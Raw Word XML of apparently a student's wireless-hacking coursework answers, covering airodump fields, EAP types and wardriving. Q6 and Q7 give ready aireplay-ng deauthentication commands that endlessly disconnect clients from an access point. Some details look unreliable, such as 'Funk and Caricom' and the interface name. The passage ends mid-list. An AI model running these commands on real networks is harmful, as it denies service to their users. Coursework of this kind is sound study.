      <w:r>
        <w:t xml:space="preserve">: MAC address of each device that connect to the </w:t>
      </w:r>
      <w:r w:rsidR="00857467">
        <w:t xml:space="preserve">WIFI. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E699BC" w14:textId="3B9E6197" w:rsidR="00857467" w:rsidRDefault="00857467" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00857467">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Station’s receive rate, followed by transmit rate. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612C183" w14:textId="6BA6EEF8" w:rsidR="00857467" w:rsidRDefault="00857467" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00F52BEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F52BEB">
        <w:t xml:space="preserve">The number of data packets lost over the last 10 seconds based on the Sequence number. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEA683" w14:textId="5CEB71BB" w:rsidR="00E85B82" w:rsidRDefault="00F52BEB" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00F52BEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packets</w:t>
      </w:r>
      <w:r>
        <w:t>: The number of data packets sent by the clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320C31F" w14:textId="50F93C4E" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00F52BEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Notes</w:t>
      </w:r>
      <w:r>
        <w:t>: Additional information about the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B544E" w14:textId="2830BB62" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00F52BEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Probes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The ESSIDs probed by the client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769FB7D6" w14:textId="77777777" w:rsidR="00E85B82" w:rsidRDefault="00E85B82" w:rsidP="00FA7290"/>
    <w:p w14:paraId="00C52A46" w14:textId="77777777" w:rsidR="00FA7290" w:rsidRDefault="00FA7290" w:rsidP="00FA7290"/>
    <w:p w14:paraId="77ECADAA" w14:textId="4DCF3C2E" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="2244A06E" w14:textId="3DCB6F22" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="407336A8" w14:textId="1F049390" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="0D9DCE90" w14:textId="7A0A1638" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="70034D1D" w14:textId="49B24B98" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="580ADC03" w14:textId="77777777" w:rsidR="000E5BF3" w:rsidRPr="00E07415" w:rsidRDefault="000E5BF3" w:rsidP="001558D1"/>
    <w:p w14:paraId="7C8BE84B" w14:textId="6A0F633E" w:rsidR="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q6: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In the same scenario of above question, you want to disconnect all client connected to that AP. What packet you will send for this and what command would you use for this? [only command and parameter definitions]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F446C" w14:textId="41B59EF0" w:rsidR="00655F67" w:rsidRPr="004231E6" w:rsidRDefault="004231E6" w:rsidP="00655F67">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0 -a E4:5f:01:0D:72:2A wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D25E21" w14:textId="1922374C" w:rsidR="00655F67" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de-authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C101923" w14:textId="1DD83E2F" w:rsidR="004231E6" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> represents an infinite amount of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauthen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks to the target Device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD64EAB" w14:textId="241FCC85" w:rsidR="004231E6" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-a:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access Point MAC address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B643FC" w14:textId="733B54F5" w:rsidR="004231E6" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wlan0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  The Wireless Network Interface Card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46372268" w14:textId="77777777" w:rsidR="004231E6" w:rsidRPr="004231E6" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1463DC1D" w14:textId="7F33AD4A" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Q7: There is a Windows machine connected to an AP. You are asked to perform a DoS attack against the client to prevent it from browsing online. Write that one command you would perform to run De-Authentication attack against the client and define each parameter in your command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3DA21" w14:textId="438B947F" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="006B4FDF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[only command and parameter definitions]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EAF6B" w14:textId="3CE10D24" w:rsidR="00E151EA" w:rsidRDefault="00E151EA" w:rsidP="00E151EA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-ng </w:t>
      </w:r>
      <w:r w:rsidR="004231E6">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r w:rsidR="001B4878">
        <w:t xml:space="preserve">-c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xx:xx:xx:xx:xx:xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a E4:5f:01:0D:72:2A wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136780D5" w14:textId="017C5C43" w:rsidR="004231E6" w:rsidRPr="004231E6" w:rsidRDefault="004231E6" w:rsidP="004231E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004231E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de-authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C7866" w14:textId="60861885" w:rsidR="00E151EA" w:rsidRDefault="00E151EA" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: represents an infinite amount of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauthen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks to the </w:t>
      </w:r>
      <w:r w:rsidR="00231DF7">
        <w:t xml:space="preserve">target Device. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFEBE2" w14:textId="53E99143" w:rsidR="001B4878" w:rsidRDefault="001B4878" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4878">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-c:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the MAC address of victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16479B" w14:textId="631AC4CC" w:rsidR="00231DF7" w:rsidRDefault="00231DF7" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00231DF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xx:xx:xx:xx:xx:xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Target Device MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCACD7" w14:textId="5B1EF07B" w:rsidR="00231DF7" w:rsidRDefault="00231DF7" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:t>: is the AP that the victim is connected to</w:t>
      </w:r>
      <w:r w:rsidR="004231E6">
        <w:t xml:space="preserve"> (MAC)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4542B410" w14:textId="2FA4855D" w:rsidR="00231DF7" w:rsidRDefault="00231DF7" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E4:5f:01:0D:72:2A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: MAC address of target AP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F948541" w14:textId="257EBE04" w:rsidR="00E151EA" w:rsidRDefault="00E151EA" w:rsidP="00E151EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t>: The Wireless Network Interface Card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E0306" w14:textId="77777777" w:rsidR="00E151EA" w:rsidRDefault="00E151EA" w:rsidP="001558D1"/>
    <w:p w14:paraId="71C6803D" w14:textId="67329779" w:rsidR="006B4FDF" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE9EBC7" w14:textId="660359BE" w:rsidR="006B4FDF" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Q8: When attacking WPA network, you want to speed up your brute force dictionary attack. How could you do this? Briefly describe a possible solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0413A" w14:textId="77777777" w:rsidR="00655F67" w:rsidRDefault="00655F67" w:rsidP="00655F67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:t>use a more powerful/complex dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057906AA" w14:textId="7A5247C0" w:rsidR="00EB0B6C" w:rsidRDefault="00655F67" w:rsidP="00EB0B6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:t xml:space="preserve">use more </w:t>
      </w:r>
      <w:r w:rsidR="00EB0B6C">
        <w:t xml:space="preserve">powerful processing power device to do brute force dictionary attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197894F" w14:textId="77777777" w:rsidR="00EB0B6C" w:rsidRDefault="00EB0B6C" w:rsidP="00F4116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DFBF3D" w14:textId="4128D169" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="001558D1"/>
    <w:p w14:paraId="65FBB277" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Q9: What is Extensible Authentication Protocol? How many types of Extensible Authentication Protocols (EAPs) are supported by WPA/WPA2 and what are they?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA59D3" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Common interview question for jobs, research type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D6F90E" w14:textId="35C09111" w:rsidR="006B4FDF" w:rsidRDefault="00A44AC0" w:rsidP="001558D1">
      <w:r>
        <w:t>EAP is an authentication framework generally used in wireless networks which provides common functions and negotiation of authentication methods known as EAP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A16D6" w14:textId="18063417" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="001558D1">
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="002211ED">
        <w:t xml:space="preserve">re are currently </w:t>
      </w:r>
      <w:r w:rsidR="00081B42">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="002211ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002211ED">
        <w:t>types</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> EAP standards supported by WPA/WPA</w:t>
      </w:r>
      <w:r w:rsidR="002211ED">
        <w:t>2 which are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA3D97" w14:textId="41092302" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="00A44AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EAP-TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9AD1F" w14:textId="2E361B4D" w:rsidR="00081B42" w:rsidRDefault="00081B42" w:rsidP="00081B42">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The original wireless LAN EAP authentication </w:t>
      </w:r>
      <w:r>
        <w:t>protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Considered one of the most secure EAP standards even though its rarely implemented due to the difficult development curve. Requires a client-side certificate which gives its </w:t>
      </w:r>
      <w:r>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>strength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690D69A" w14:textId="77777777" w:rsidR="00081B42" w:rsidRDefault="00081B42" w:rsidP="00081B42">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001F54A2" w14:textId="327EB08B" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="00A44AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EAP-TTLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73562170" w14:textId="1AD75BEA" w:rsidR="00081B42" w:rsidRDefault="009B0893" w:rsidP="00081B42">
      <w:r>
        <w:t>Developed by Funk and Caricom, unique over PEAP because username is not revealed in clear text, which can prevent some DoS attacks where user can repeatedly attempt to log  in with correct username and incorrect password.  The TLS tunnel however only protects the password. So it is still possible to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08A37C" w14:textId="0199D780" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="00A44AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PEAPv0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECF1BE" w14:textId="380F3425" w:rsidR="00081B42" w:rsidRDefault="00081B42" w:rsidP="00081B42">
      <w:r>
        <w:t xml:space="preserve">Developed by Microsoft and Cisco. Client and server implementations, has universal support and is the second most widely supported EAP standard in the world. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7776CB" w14:textId="77777777" w:rsidR="00081B42" w:rsidRDefault="00081B42" w:rsidP="00081B42"/>
    <w:p w14:paraId="20C7C8F9" w14:textId="6F25ADFA" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="00A44AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PEAPv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139038F3" w14:textId="6FD1FB7C" w:rsidR="00081B42" w:rsidRDefault="00081B42" w:rsidP="00081B42">
      <w:r>
        <w:t>Cisco alternative to the above. Differs by allowing the use of an inner authentication protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39653B51" w14:textId="14026261" w:rsidR="00A44AC0" w:rsidRDefault="00A44AC0" w:rsidP="00A44AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EAP-SIM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A84CD80" w14:textId="3EB723F7" w:rsidR="009B0893" w:rsidRDefault="009B0893" w:rsidP="009B0893">
      <w:r>
        <w:t xml:space="preserve">Created for the GSM mobile telecom industry which uses SIM cards for authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6EA045" w14:textId="250772A0" w:rsidR="004231E6" w:rsidRDefault="004231E6" w:rsidP="001558D1"/>
    <w:p w14:paraId="29C52BD5" w14:textId="77777777" w:rsidR="004231E6" w:rsidRDefault="004231E6" w:rsidP="001558D1"/>
    <w:p w14:paraId="0BD0C988" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q10: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315CB6B5" w14:textId="62CDCA25" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- What is "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Wardriving"? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA1379" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- List 4 tools that can be used for Wardriving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529DB00" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I've heard that turning off SSID broadcasts can stop war drivers from discovering wireless networks -- is that true?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C38B3C" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRPr="00655F67" w:rsidRDefault="006B4FDF" w:rsidP="00655F67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Common interview question)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644710C4" w14:textId="6837CDA7" w:rsidR="006B4FDF" w:rsidRDefault="00B26E7B" w:rsidP="00B26E7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WIFI Wardriving is a physically process that a person drives a car around the area to locate and gathering Wireless Networks and the Wireless Information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D99520" w14:textId="731A9B6C" w:rsidR="006B4FDF" w:rsidRPr="00B26E7B" w:rsidRDefault="00B26E7B" w:rsidP="00B26E7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Tools that used for wardriving:</w:t>
      </w:r>
    </w:p>
